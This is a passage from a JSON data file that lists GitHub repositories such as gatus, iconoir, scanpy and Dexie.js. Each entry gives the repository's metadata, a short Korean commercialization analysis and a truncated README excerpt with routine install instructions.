c - '0';\r\n    c = getchar();\r\n  }\r\n  return x * f;\r\n}\r\n```\r\n\r\n### 错误报告\r\n\r\n![error reporting](assets/error_reporting.png)\r\n\r\n## 安装\n\n### 在线使用（推荐）\n\n**推荐直接使用在线网页版本，无需下载安装！**\n\n访问：https://enter-tainer.github.io/cxx2flow/\n\n在线版本提供了完整的功能，包括代码编辑器和实时流程图预览，无需安装任何软件即可使用。\n\n### 自行编译\n\r\n```bash\r\ncargo install cxx2flow\r\n```\r\n\r\n### 下载预构建二进制\n\n推荐从右侧的 [Github Release](https://github.com/Enter-tainer/cxx2flow/releases) 下载对应平台的二进制文件。\n\r\n### 使用 GUI 版本\r\n\r\n对于没有命令行使用经验的用户，推荐下载使用基于 tauri 编写的 GUI 版本。 https://github.com/Enter-tainer/cxx2flow-gui/releases\r\n\r\n![gui](https://github.com/E","composite_score":0.0302,"license_safety_tag":"safe"},{"name":"Remix-Design/RemixIcon","github_url":"https://github.com/Remix-Design/RemixIcon","stars":5,"language":"Less","license":"NOASSERTION","abandonment_months":1,"description":"# Remix-Design/RemixIcon 평가 보고서\n\n## 왜 보물인가\n웹사이트와 앱을 만드는 디자이너들이 필요로 하는 아이콘(작은 그림 기호) 라이브러리로, 직관적이고 사용하기 쉬워 전 세계 많은 프로젝트에서 활용되고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (웹 기반 업무 도구)**\n- 프로젝트 관리, 메모 앱, 협업 도구 ","readme_excerpt":"[![logo](./.github/files/logo-github.svg)](https://remixicon.com)\n\n[![npm](https://img.shields.io/npm/v/remixicon.svg?labelColor=4A4A4A&color=006AFF&style=flat-square)](https://www.npmjs.com/package/remixicon)\n[![downloads](https://img.shields.io/npm/dt/remixicon.svg?labelColor=4A4A4A&color=23AF5F&style=flat-square)](https://www.npmjs.com/package/remixicon)\n[![](https://data.jsdelivr.com/v1/package/npm/remixicon/badge)](https://www.jsdelivr.com/package/npm/remixicon)\n[![donate](https://img.shields.io/badge/-Donate-DA6429.svg?style=flat-square)](https://remixicon.com/support-us)\n\n[![Sponsor](./.github/files/streamline.svg)](https://go.streamlinehq.com/remix-github)\n\nEnglish | [简体中文](./README_CN.md)\n\nRemix Icon is a set of open-source neutral-style system symbols for designers and developers. Unlike a patchwork icon library, 3200+ icons are all elaborately crafted so that they are born with the genes of readability, consistency, and perfect pixels. Each icon was designed in \"Outlined\" an","composite_score":0.0302,"license_safety_tag":"unknown"},{"name":"TwinProduction/gatus","github_url":"https://github.com/TwinProduction/gatus","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# TwinProduction/gatus 분석 보고서\n\n## 왜 보물인가\n웹사이트나 서비스가 제대로 작동하는지 자동으로 감시하고 문제가 생기면 알려주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 모니터링 서비스로 기업 고객에게 월 구독료로 판매\n2. **내부 업무 도구**: 회사의 서버와 웹사이트 상태를 직원들이 대","readme_excerpt":"[![Gatus](.github/assets/logo-with-dark-text.png)](https://gatus.io)\n\n![test](https://github.com/TwiN/gatus/actions/workflows/test.yml/badge.svg)\n[![Go Report Card](https://goreportcard.com/badge/github.com/TwiN/gatus?)](https://goreportcard.com/report/github.com/TwiN/gatus)\n[![codecov](https://codecov.io/gh/TwiN/gatus/branch/master/graph/badge.svg)](https://codecov.io/gh/TwiN/gatus)\n[![Go version](https://img.shields.io/github/go-mod/go-version/TwiN/gatus.svg)](https://github.com/TwiN/gatus)\n[![Docker pulls](https://img.shields.io/docker/pulls/twinproduction/gatus.svg)](https://cloud.docker.com/repository/docker/twinproduction/gatus)\n[![Follow TwiN](https://img.shields.io/github/followers/TwiN?label=Follow&style=social)](https://github.com/TwiN)\n\nGatus is a developer-oriented health dashboard that gives you the ability to monitor your services using HTTP, ICMP, TCP, and even DNS\nqueries as well as evaluate the result of said queries by using a list of conditions on values like the sta","composite_score":0.0301,"license_safety_tag":"safe"},{"name":"lucaburgio/iconoir","github_url":"https://github.com/lucaburgio/iconoir","stars":45,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# iconoir 저장소 분석\n\n## 왜 보물인가\n웹사이트와 앱을 만드는 사람들이 필요로 하는 깔끔한 아이콘 디자인 모음집입니다.\n\n## 어디에 쓸 수 있나\n1. **디자인 도구 SaaS**: 캔바, 피그마 같은 디자인 플랫폼에 iconoir 아이콘을 통합하여 사용자가 즉시 사용 가능한 아이콘 라이브러리 제공\n2. **기업 대시보드 개발**: 회사의 내부 ","readme_excerpt":"# Iconoir\n\n[![Version](https://img.shields.io/github/v/release/iconoir-icons/iconoir?style=flat-square)](https://github.com/iconoir-icons/iconoir/releases)\n[![Project Stars](https://img.shields.io/github/stars/iconoir-icons/iconoir?style=flat-square)](https://github.com/iconoir-icons/iconoir)\n[![License](https://img.shields.io/github/license/iconoir-icons/iconoir?style=flat-square)](https://github.com/iconoir-icons/iconoir/blob/main/LICENSE)\n[![Discord](https://img.shields.io/discord/998909400234348615?color=5865f2&label=discord&style=flat-square)](https://discord.gg/txXcKCAmKW)\n\n## What is Iconoir?\n\nIconoir is an open-source library with 1600+ unique SVG icons, designed on a 24x24 pixels grid.\n\n<a href=\"https://iconoir.com\"><strong>Browse at iconoir.com &rarr;</strong></a>\n\n## Basic Usage\n\nYou can download any icon of the pack directly from https://iconoir.com or get them from this repository.\n\nThe icons are also available via the [`iconoir`](https://www.npmjs.com/package/iconoir) NPM","composite_score":0.03,"license_safety_tag":"safe"},{"name":"phongnguyend/Practical.CleanArchitecture","github_url":"https://github.com/phongnguyend/Practical.CleanArchitecture","stars":8,"language":"C#","license":"MIT","abandonment_months":1,"description":"# Practical.CleanArchitecture 분석\n\n## 왜 보물인가\n소프트웨어를 만드는 회사들이 장기적으로 유지보수하기 쉽게 설계하는 '깨끗한 구조' 방법론을 실무에 맞게 정리한 실용 가이드입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 전자상거래 플랫폼, 프로젝트 관리 도구 등 복잡한 기능을 가진 웹 서비스의 개발 기초로 활","readme_excerpt":"#\n> :warning: **Warning**\n> \n> The code samples contain multiple ways and patterns to do things and not always be considered best practices or recommended for all situations.\n#\n\n# Database Centric vs Domain Centric Architecture \n![alt text](/docs/imgs/database-centrics-vs-domain-centric-architecture.png)\n\n[*(open on draw.io)*](https://www.draw.io/#Uhttps%3A%2F%2Fraw.githubusercontent.com%2Fphongnguyend%2FPractical.CleanArchitecture%2Fmaster%2Fdocs%2Fimgs%2Fdatabase-centrics-vs-domain-centric-architecture.drawio)\n\n# Hexagonal Architecture\n![alt text](/docs/imgs/hexagonal-architecture.png)\n\n[*(open on draw.io)*](https://www.draw.io/#Uhttps%3A%2F%2Fraw.githubusercontent.com%2Fphongnguyend%2FPractical.CleanArchitecture%2Fmaster%2Fdocs%2Fimgs%2Fhexagonal-architecture.drawio)\n\n# Onion Architecture\n![alt text](/docs/imgs/onion-architecture.png)\n\n[*(open on draw.io)*](https://www.draw.io/#Uhttps%3A%2F%2Fraw.githubusercontent.com%2Fphongnguyend%2FPractical.CleanArchitecture%2Fmaster%2Fdocs%2Fim","composite_score":0.03,"license_safety_tag":"safe"},{"name":"ad-si/RosettaGit","github_url":"https://github.com/ad-si/RosettaGit","stars":7,"language":"Python","license":"unknown","abandonment_months":1,"description":"# RosettaGit 저장소 분석\n\n## 왜 보물인가\n다양한 프로그래밍 언어로 같은 문제를 푸는 방법을 모아놓아, 프로그래머들이 언어 간 차이를 빠르게 학습할 수 있는 실용적인 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **프로그래밍 교육 플랫폼**: 초보자용 온라인 강의에서 \"같은 문제를 5가지 언어로 풀어보기\" 기능 제공\n2. **코드 변환 도","readme_excerpt":"# RosettaGit\n\n## Installation\n\n### MacOS\n\n```sh\nbrew install zola\n```\n\n### Other\n\nCheck out Zola's [official installation instructions][oii]\nfor install commands on other operating systems.\n\n[oii]: https://www.getzola.org/documentation/getting-started/installation/\n\n\n## Development\n\nCheck out the [makefile](./makefile) for all relevant tasks.\n\nTip:\nMove drafts out of the `content` directory\nto avoid building them during development.\n","composite_score":0.0299,"license_safety_tag":"unknown"},{"name":"theislab/scanpy","github_url":"https://github.com/theislab/scanpy","stars":5,"language":"Python","license":"bsd-3-clause","abandonment_months":0,"description":"# Scanpy 저장소 분석\n\n## 왜 보물인가\n생물 연구자들이 복잡한 세포 데이터를 쉽게 분석하고 시각화할 수 있는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **바이오 데이터 분석 SaaS**: 대학 및 제약사 연구팀이 구독하는 클라우드 기반 분석 플랫폼으로 제공\n2. **병원 진단 시스템**: 암 세포 분류나 질병 진단을 돕는 의료기관 내부 ","readme_excerpt":"[![Stars](https://img.shields.io/github/stars/scverse/scanpy?style=flat&logo=GitHub&color=yellow)](https://github.com/scverse/scanpy/stargazers)\n[![PyPI](https://img.shields.io/pypi/v/scanpy)](https://pypi.org/project/scanpy)\n[![PyPI Downloads](https://img.shields.io/pepy/dt/scanpy?logo=pypi)](https://pepy.tech/project/scanpy)\n[![Conda Forge](https://img.shields.io/conda/vn/conda-forge/scanpy)\n![Conda Forge Downloads](https://img.shields.io/conda/dn/conda-forge/scanpy?logo=condaforge)](https://anaconda.org/conda-forge/scanpy)\n[![Docs](https://readthedocs.com/projects/icb-scanpy/badge/?version=latest)](https://scanpy.readthedocs.io)\n[![CI](https://github.com/scverse/scanpy/actions/workflows/ci.yml/badge.svg)](https://github.com/scverse/scanpy/actions/workflows/ci.yml)\n[![Discourse topics](https://img.shields.io/discourse/posts?color=yellow&logo=discourse&server=https%3A%2F%2Fdiscourse.scverse.org)](https://discourse.scverse.org/)\n[![Chat](https://img.shields.io/badge/zulip-join_chat-%23","composite_score":0.0298,"license_safety_tag":"safe"},{"name":"kentcdodds/kentcdodds.com","github_url":"https://github.com/kentcdodds/kentcdodds.com","stars":12,"language":"MDX","license":"NOASSERTION","abandonment_months":0,"description":"# kentcdodds/kentcdodds.com 상용화 분석\n\n## 왜 보물인가\n유명한 웹 개발 강사의 개인 브랜드 웹사이트로, 온라인 교육 플랫폼이나 개발자 커뮤니티 구축의 성공 사례를 담고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 온라인 강의와 튜토리얼을 판매하는 SaaS 서비스로 운영\n2. **구독형 학습 커뮤니티**:","readme_excerpt":"# Kent C. Dodds' site\n\n[![Build Status][build-badge]][build]\n[![GPL 3.0 License][license-badge]][license]\n\nThis repository contains the source code for\n[kentcdodds.com](https://kentcdodds.com/), built with Remix, React, TypeScript,\nVite, and an Express server.\n\n## Tech stack\n\n- React Router + React + TypeScript\n- Vite build pipeline\n- Express runtime server\n- Prisma + SQLite\n- Tailwind CSS\n- Vitest and Playwright for testing\n\n## Prerequisites\n\n- [Node.js](https://nodejs.org/) `24`\n- `npm` `>=10`\n- [git](https://git-scm.com/)\n\n## Setup\n\n1. Clone the repository.\n2. Copy environment variables:\n   - `cp services/site/.env.example services/site/.env`\n3. Run the full setup script:\n   - `npm run setup -s`\n\nThe setup script installs dependencies, resets the local database, validates the\nproject, primes local cache data, installs Playwright browsers, and runs\nend-to-end tests.\n\nThis repo now uses npm workspaces. Install dependencies from the repository root\nso the site and worker packages share","composite_score":0.0298,"license_safety_tag":"unknown"},{"name":"AvdLee/appstoreconnect-swift-sdk","github_url":"https://github.com/AvdLee/appstoreconnect-swift-sdk","stars":18,"language":"Swift","license":"NOASSERTION","abandonment_months":2,"description":"# AppStore Connect Swift SDK 분석\n\n## 왜 보물인가\n아이폰 앱을 판매하는 개발자들이 애플 앱스토어 관리 작업을 자동으로 처리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 앱 배포 자동화 서비스**\n앱 개발사들이 새 버전을 자동으로 앱스토어에 올리고 관리하는 SaaS 플랫폼으로 제공할 수 있습니다.\n\n**2. 개발사 ","readme_excerpt":"# App Store Connect Swift SDK\n\nThe Swift SDK to work with the App Store Connect API from Apple.\n\n[![Platform Compatibility](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2FAvdLee%2Fappstoreconnect-swift-sdk%2Fbadge%3Ftype%3Dplatforms)](https://swiftpackageindex.com/AvdLee/appstoreconnect-swift-sdk) ![Dependency frameworks](https://img.shields.io/badge/Supports-_Swift_Package_Manager-F16D39.svg?style=flat) [![Twitter](https://img.shields.io/badge/twitter-@Twannl-blue.svg?style=flat)](https://x.com/twannl)\n\n## Kickstart information on the API\n\n- [Automate your workflow with the App Store Connect API](https://developer.apple.com/app-store-connect/api/)\n- [Official Apple Documentation](https://developer.apple.com/documentation/appstoreconnectapi)\n- WWDC 2018 Talk [Automating App Store Connect](https://developer.apple.com/videos/play/wwdc2018/303/)\n- [App Store Connect API adoption with use case examples](https://www.avanderlee.com/general/app-stor","composite_score":0.0294,"license_safety_tag":"unknown"},{"name":"zombodb/pgx","github_url":"https://github.com/zombodb/pgx","stars":5,"language":"Rust","license":"NOASSERTION","abandonment_months":1,"description":"# zombodb/pgx 프로젝트 분석\n\n## 왜 보물인가\n데이터베이스와 검색 엔진을 연결해주는 기술로, 대량의 데이터에서 빠르게 원하는 정보를 찾을 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 전자상거래 플랫폼에서 상품 검색 기능을 초고속으로 제공하는 검색 서비스\n**2. 내부 업무 도구**: 대규모 기업의 문서 관리","readme_excerpt":"![Logo](art/pgrx-logo-color-transparent-475x518.png)\n\n# `pgrx`\n\n> Build Postgres Extensions with Rust!\n\n![GitHub Actions badge](https://github.com/pgcentralfoundation/pgrx/actions/workflows/tests.yml/badge.svg)\n[![crates.io badge](https://img.shields.io/crates/v/pgrx.svg)](https://crates.io/crates/pgrx)\n[![docs.rs badge](https://docs.rs/pgrx/badge.svg)](https://docs.rs/pgrx)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pgrx_rs.svg?style=flat)](https://twitter.com/pgrx_rs)\n[![Discord Chat](https://img.shields.io/discord/710918545906597938.svg)][Discord]\n\n\n`pgrx` is a framework for developing PostgreSQL extensions in Rust and strives to be as idiomatic and safe as possible.\n\n`pgrx` supports Postgres 13 through Postgres 18.\n\n## Want to chat with us or get a question answered?\n\n   + **Please join our [Discord Server][Discord].**\n\n   + **We are also in need of financial [sponsorship](https://checkout.square.site/merchant/MLHG5M9GAXQPV/checkout/2OW2SULDQBSZ2JLHSLRZQLZH).**\n\n## Ke","composite_score":0.0294,"license_safety_tag":"unknown"},{"name":"doctrine/common","github_url":"https://github.com/doctrine/common","stars":7,"language":"PHP","license":"mit","abandonment_months":2,"description":"# Doctrine Common 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션을 만들 때 필요한 기초적인 도구 모음으로, 다른 개발자들이 만든 복잡한 기능을 쉽게 재사용할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 데이터를 효율적으로 관리하는 웹 서비스 구축\n- **내부 업무 도구**: 회사 직원들이 사용하는 업무 관","readme_excerpt":"# Doctrine Common\n\n[![Build Status](https://github.com/doctrine/common/workflows/Continuous%20Integration/badge.svg)](https://github.com/doctrine/common/actions)\n[![codecov](https://codecov.io/gh/doctrine/common/branch/3.1.x/graph/badge.svg)](https://codecov.io/gh/doctrine/common)\n\nThe Doctrine Common project is a library that provides extensions to core PHP functionality.\n\n## More resources:\n\n* [Website](https://www.doctrine-project.org/)\n* [Documentation](https://www.doctrine-project.org/projects/doctrine-common/en/current/)\n* [Downloads](https://github.com/doctrine/common/releases)\n","composite_score":0.0293,"license_safety_tag":"safe"},{"name":"microsoft/Xaml-Controls-Gallery","github_url":"https://github.com/microsoft/Xaml-Controls-Gallery","stars":5,"language":"C#","license":"MIT","abandonment_months":0,"description":"# Xaml-Controls-Gallery 상용화 분석\n\n## 왜 보물인가\nMicrosoft가 공식 제공하는 윈도우 앱 UI 디자인 샘플 모음으로, 전문적이고 안정적인 사용자 인터페이스를 빠르게 만들 수 있는 설계도 역할을 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업용 SaaS 서비스**: 대기업 직원들이 사용하는 관리 시스템이나 데이터 분석 플랫폼","readme_excerpt":"![WinUI Gallery hero image](./.github/assets/ReadmeHero-dark.png)\r\n\r\n<h1 align=\"center\">WinUI 3 Gallery</h1>\r\n<p align=\"center\">Companion app for <a style=\"text-decoration:none\" href=\"https://docs.microsoft.com/windows/apps/winui\">WinUI</a> & <a style=\"text-decoration:none\" href=\"https://github.com/microsoft/WindowsAppSDK\">Windows App SDK</a> APIs</p>\r\n\r\n\r\nThis app demonstrates all of the WinUI 3 controls and styles available to make a modern Windows app with the Windows App SDK. It is the interactive companion to the [Fluent Design guidelines](https://docs.microsoft.com/windows/apps/design/basics/) and shows the usage of [WinUI](https://docs.microsoft.com/windows/apps/winui/) through interactive samples, tools and code snippets. \r\n\r\n\r\n\r\n<p align=\"center\">\r\n  <img src=\"./.github/assets/Screenshot-light.png\" alt=\"WinUI 3 Gallery\" width=\"400\"/>\r\n</p>\r\n<p align=\"center\">\r\n  <a style=\"text-decoration:none\" href=\"https://apps.microsoft.com/detail/9P3JFPWWDZRC?launch=true&mode=full\">\r\n    <p","composite_score":0.0293,"license_safety_tag":"safe"},{"name":"google/deepconsensus","github_url":"https://github.com/google/deepconsensus","stars":20,"language":"Python","license":"bsd-3-clause","abandonment_months":2,"description":"# Google DeepConsensus 분석\n\n## 왜 보물인가\n생물학 데이터를 더 정확하게 읽어내는 기술로, 유전자 검사나 질병 진단의 정확도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **유전자 검사 SaaS**: 병원과 진단 기관에 클라우드 기반 정확한 유전자 분석 서비스 제공\n2. **의료기관 내부 도구**: 대학병원 연구소의 유전","readme_excerpt":"# DeepConsensus\n\nDeepConsensus uses gap-aware sequence transformers to correct errors in Pacific\nBiosciences (PacBio) Circular Consensus Sequencing (CCS) data.\n\nThis results in greater yield of high-quality reads. See\n[yield metrics](docs/yield_metrics.md) for results on three full SMRT Cells with\ndifferent chemistries and read length distributions.\n\n## Usage\n\nSee the [quick start](docs/quick_start.md) for how to run DeepConsensus, along\nwith guidance on how to shard and parallelize most effectively.\n\n### `ccs` settings matter\n\nTo get the most out of DeepConsensus, we **highly** recommend that you run `ccs`\nwith the parameters given in the [quick start](docs/quick_start.md). This is\nbecause `ccs` by default filters out reads below a predicted quality of 20,\nwhich then cannot be rescued by DeepConsensus. The runtime of `ccs` is low\nenough that it is definitely worth doing this extra step whenever you are using\nDeepConsensus.\n\n### Compute setup\n\nThe recommended compute setup for DeepCons","composite_score":0.0293,"license_safety_tag":"safe"},{"name":"dfahlander/Dexie.js","github_url":"https://github.com/dfahlander/Dexie.js","stars":6,"language":"TypeScript","license":"apache-2.0","abandonment_months":0,"description":"# Dexie.js 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 데이터를 빠르고 안정적으로 저장하는 기술로, 복잡한 데이터 관리가 필요한 모든 웹 서비스의 핵심 기반이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 오프라인에서도 작동하는 프로젝트 관리 도구나 노트 애플리케이션 개발\n- **내부 업무 도구**: 대량의 거래 ","readme_excerpt":"# Dexie.js\n\n[![NPM Version][npm-image]][npm-url] ![Build Status](https://github.com/dexie/Dexie.js/actions/workflows/main.yml/badge.svg) [![Join our Discord](https://img.shields.io/discord/1328303736363421747?label=Discord&logo=discord&style=badge)](https://discord.gg/huhre7MHBF)\n\nDexie.js is a wrapper library for indexedDB - the standard database in the browser. https://dexie.org.\n\n#### Why Dexie.js?\n\nIndexedDB is the portable database for all browser engines. Dexie.js makes it fun and easy to work with.\n\nBut also:\n\n* Dexie.js is widely used by 100,000 of web sites, apps and other projects and supports all browsers, Electron for Desktop apps, Capacitor for iOS / Android apps and of course pure PWAs.\n* Dexie.js works around bugs in the IndexedDB implementations, giving a more stable user experience.\n* Need sync? [Dexie Cloud](https://dexie.org/cloud/) adds real-time sync, auth, and collaboration on top of Dexie.js — no backend needed.\n\n#### Hello World (vanilla JS)\n\n```html\n<!DOCTYPE h","composite_score":0.0292,"license_safety_tag":"safe"},{"name":"elastic/go-elasticsearch","github_url":"https://github.com/elastic/go-elasticsearch","stars":13,"language":"Go","license":"apache-2.0","abandonment_months":0,"description":"# elastic/go-elasticsearch 분석 보고서\n\n## 왜 보물인가\n세계 최대 검색 엔진 회사인 Elastic이 직접 만든 공식 도구로, 대용량 데이터 검색 기능이 필요한 모든 서비스에서 필수적으로 사용됩니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 수백만 개의 상품 중에서 사용자가 원하는 상품을 빠르게 찾는 검색 기능 구현","readme_excerpt":"# go-elasticsearch\n\nThe official Go client for [Elasticsearch](https://www.elastic.co/products/elasticsearch).\n\n**[Download the latest version of Elasticsearch](https://www.elastic.co/downloads/elasticsearch)**\nor\n**[sign-up](https://cloud.elastic.co/registration?elektra=en-ess-sign-up-page)**\n**for a free trial of Elastic Cloud**.\n\n[![Go Reference](https://pkg.go.dev/badge/github.com/elastic/go-elasticsearch/v9.svg)](https://pkg.go.dev/github.com/elastic/go-elasticsearch/v9)\n[![Go Report Card](https://goreportcard.com/badge/github.com/elastic/go-elasticsearch)](https://goreportcard.com/report/github.com/elastic/go-elasticsearch)\n[![Build](https://github.com/elastic/go-elasticsearch/actions/workflows/build.yml/badge.svg?branch=main)](https://github.com/elastic/go-elasticsearch/actions/workflows/build.yml?query=branch%3Amain)\n[![Unit](https://github.com/elastic/go-elasticsearch/actions/workflows/test-unit.yml/badge.svg?branch=main)](https://github.com/elastic/go-elasticsearch/actions/wo","composite_score":0.0292,"license_safety_tag":"safe"},{"name":"maximecb/gym-minigrid","github_url":"https://github.com/maximecb/gym-minigrid","stars":5,"language":"Python","license":"apache-2.0","abandonment_months":0,"description":"# gym-minigrid 상품화 분석\n\n## 왜 보물인가\n인공지능이 게임 환경에서 학습하고 의사결정하는 능력을 테스트할 수 있는 표준화된 도구로, 교육·연구·제품 개발에 필수적인 기초 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 학습 플랫폼 SaaS**: 대학이나 기업이 구독하여 학생/직원이 인공지능 알고리즘을 직접 만들고 테스트할 수 있는 ","readme_excerpt":"[![PyPI version](https://badge.fury.io/py/minigrid.svg)](https://badge.fury.io/py/minigrid)\n[![pre-commit](https://img.shields.io/badge/pre--commit-enabled-brightgreen?logo=pre-commit&logoColor=white)](https://pre-commit.com/)\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n\n<p align=\"center\">\n    <a href = \"https://minigrid.farama.org/\" target = \"_blank\" > <img src=\"https://raw.githubusercontent.com/Farama-Foundation/Minigrid/master/minigrid-text.png\" width=\"500px\"/> </a>\n</p>\n\n<p align=\"center\">\n  <img src=\"figures/door-key-curriculum.gif\" width=200 alt=\"Figure Door Key Curriculum\">\n</p>\n\nThe Minigrid library contains a collection of discrete grid-world environments to conduct research on Reinforcement Learning. The environments follow the [Gymnasium](https://github.com/Farama-Foundation/Gymnasium) standard API and they are designed to be lightweight, fast, and easily customizable.\n\nThe documentation website is at [mini","composite_score":0.0291,"license_safety_tag":"safe"},{"name":"PokeAPI/sprites","github_url":"https://github.com/PokeAPI/sprites","stars":9,"language":"Python","license":"NOASSERTION","abandonment_months":1,"description":"# PokeAPI/sprites 보물지도\n\n## 왜 보물인가\n포켓몬 게임과 앱을 만드는 개발자들이 필요로 하는 포켓몬 이미지들을 한곳에서 무료로 제공하기 때문입니다.\n\n## 어디에 쓸 수 있나\n- **게임/앱 개발 SaaS**: 인디 게임 개발자를 위해 포켓몬 이미지를 API 형태로 월정액 제공하는 서비스\n- **학습 플랫폼 내부 도구**: 온라인 포켓몬 ","readme_excerpt":"# PokéAPI Sprites <a href=\"https://pokeapi.co/api/v2/pokemon/smeargle\"><img src='https://raw.githubusercontent.com/PokeAPI/sprites/master/sprites/pokemon/other/dream-world/235.svg' height=50px/></a>\n\nTo save load on PokéAPI, we host all the sprite images here.\nIf you want to use all the sprites in your application, you can just download the entire contents directly.\n\n## Install\n\n### Git\n\n```sh\ngit clone https://github.com/PokeAPI/sprites.git\n```\n\n### Npm\n\n```sh\nnpm install --save github:PokeAPI/sprites\n```\n\n### Bower\n\n```sh\nbower install --save PokeAPI/sprites\n```\n\n## Sprites\n\nThe sprites are divided in the different subfolders you can see below.\n\n```\nsprites\n\\- pokemon\n    \\- other\n        \\- dream world (SVGs)\n        \\- official artwork (PNGs)\n        \\- showdown (GIFs)\n        \\- home (PNGs)\n    \\- versions\n        \\- generation i\n            \\- red and blue (PNGs with back, gray, transparent, back-gray variants)\n            \\- yellow (PNGs with back, gbc, gray, transparent, back-g","composite_score":0.0291,"license_safety_tag":"unknown"},{"name":"lando/lando","github_url":"https://github.com/lando/lando","stars":5,"language":"","license":"gpl-3.0","abandonment_months":1,"description":"# Lando 저장소 분석\n\n## 왜 보물인가\n웹사이트 개발자들이 로컬 환경에서 복잡한 서버 설정 없이 실제 운영 환경과 동일하게 작업할 수 있게 해주는 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 개발 에이전시의 내부 도구**: 팀원들이 프로젝트마다 동일한 개발 환경을 자동 구성하여 \"내 컴퓨터에서는 잘 되는데?\"라는 문제 해결\n2. **클","readme_excerpt":"<div align=\"center\">\n\n<a href=\"https://lando.dev\" target=\"_blank\"><img width=\"250\" src=\"https://docs.lando.dev/images/icon.svg\" alt=\"Lando logo\"></a>\n\n# Lando\n\n### A Liberating Dev Tool For All Your Projects\n\nThe local development and DevOps tool trusted by professional developers across the galaxy.\n\nFree yourself from the mind-forged manacles of lesser dev tools. Save time, headaches, frustration and do more real work.\n\n**[learn more](https://lando.dev) |\n[what is it good for?](https://docs.lando.dev/getting-started/#what-is-it-good-for) |\n[wait, doesn't docker compose do this?](https://docs.lando.dev/getting-started/#wait-doesn-t-docker-compose-do-this)**\n\n## Support Lando\n\nLando is and always will be FREE and OPEN SOURCE. As such it relies on generous contributions from its community to fund its development. Join our list of list of [great sponsors!](https://lando.dev/sponsor/) by contributing.\n\n[GitHub Sponsors](https://github.com/sponsors/lando) |\n[Patreon](https://www.patreon.com","composite_score":0.0291,"license_safety_tag":"restricted"},{"name":"doctrine/deprecations","github_url":"https://github.com/doctrine/deprecations","stars":5,"language":"PHP","license":"MIT","abandonment_months":2,"description":"# doctrine/deprecations 상업화 분석\n\n## 왜 보물인가\n소프트웨어가 업데이트될 때 오래된 기능들을 안전하게 제거하는 과정을 자동화해주는 도구로, 개발자들의 반복적인 관리 업무를 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n- **API 판매**: 클라우드 기반 API 서비스에서 버전 관리 시스템으로 제공하여 고객사의 자동 마이그레이션 지","readme_excerpt":"# Doctrine Deprecations\n\nA small (side-effect free by default) layer on top of\n`trigger_error(E_USER_DEPRECATED)` or PSR-3 logging.\n\n- no side-effects by default, making it a perfect fit for libraries that don't know how the error handler works they operate under\n- options to avoid having to rely on error handlers global state by using PSR-3 logging\n- deduplicate deprecation messages to avoid excessive triggering and reduce overhead\n\nWe recommend to collect Deprecations using a PSR logger instead of relying on\nthe global error handler.\n\n## Usage from consumer perspective:\n\nEnable Doctrine deprecations to be sent to a PSR3 logger:\n\n```php\n\\Doctrine\\Deprecations\\Deprecation::enableWithPsrLogger($logger);\n```\n\nEnable Doctrine deprecations to be sent as `@trigger_error($message, E_USER_DEPRECATED)`\nmessages by setting the `DOCTRINE_DEPRECATIONS` environment variable to `trigger`.\nAlternatively, call:\n\n```php\n\\Doctrine\\Deprecations\\Deprecation::enableWithTriggerError();\n```\n\nIf you only wan","composite_score":0.029,"license_safety_tag":"safe"},{"name":"glepnir/dashboard-nvim","github_url":"https://github.com/glepnir/dashboard-nvim","stars":11,"language":"Lua","license":"MIT","abandonment_months":1,"description":"# dashboard-nvim 상업화 분석\n\n## 왜 보물인가\n프로그래머들이 자주 쓰는 편집기를 더 예쁘고 효율적으로 만드는 디자인 도구로, 기술 커뮤니티에서 즉시 활용 가능한 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **개발 도구 SaaS**: 프로그래머 커뮤니티를 위한 편집기 테마 및 레이아웃 커스터마이징 클라우드 플랫폼\n2. **내부 업","readme_excerpt":"<h1 align=\"center\">\n  Fancy and Blazing Fast start screen plugin of neovim\n</h1>\n\n| <center>Hyper</center> | <center>Doom</center> |\n| ---   | ---   |\n| <center><img src=\"https://user-images.githubusercontent.com/41671631/215015845-b13343c4-427e-45d6-9f92-267ab909eff1.png\" width=80% height=80%/></center>|<center> <img src=\"https://user-images.githubusercontent.com/41671631/214518543-d7d6afbf-f405-4a6f-a505-568c5a101e92.png\" width=80% height=80%/> </center>|\n\n# Feature\n\n- Low memory usage. dashboard does not store the all user configs in memory like header etc these string will take some memory. now it will be clean after you open a file. you can still use dashboard command to open a new one , then dashboard will read the config from cache.\n- Blazing fast\n\n\n# Install\n\n- Lazy.nvim\n\n```lua\n{\n  'nvimdev/dashboard-nvim',\n  event = 'VimEnter',\n  config = function()\n    require('dashboard').setup {\n      -- config\n    }\n  end,\n  dependencies = { {'nvim-tree/nvim-web-devicons'}}\n}\n```\n\n- Packe","composite_score":0.0289,"license_safety_tag":"safe"},{"name":"daquexian/onnx-simplifier","github_url":"https://github.com/daquexian/onnx-simplifier","stars":5,"language":"C++","license":"Apache-2.0","abandonment_months":1,"description":"# ONNX Simplifier 상용화 분석\n\n## 왜 보물인가\n인공지능 모델을 더 작고 빠르게 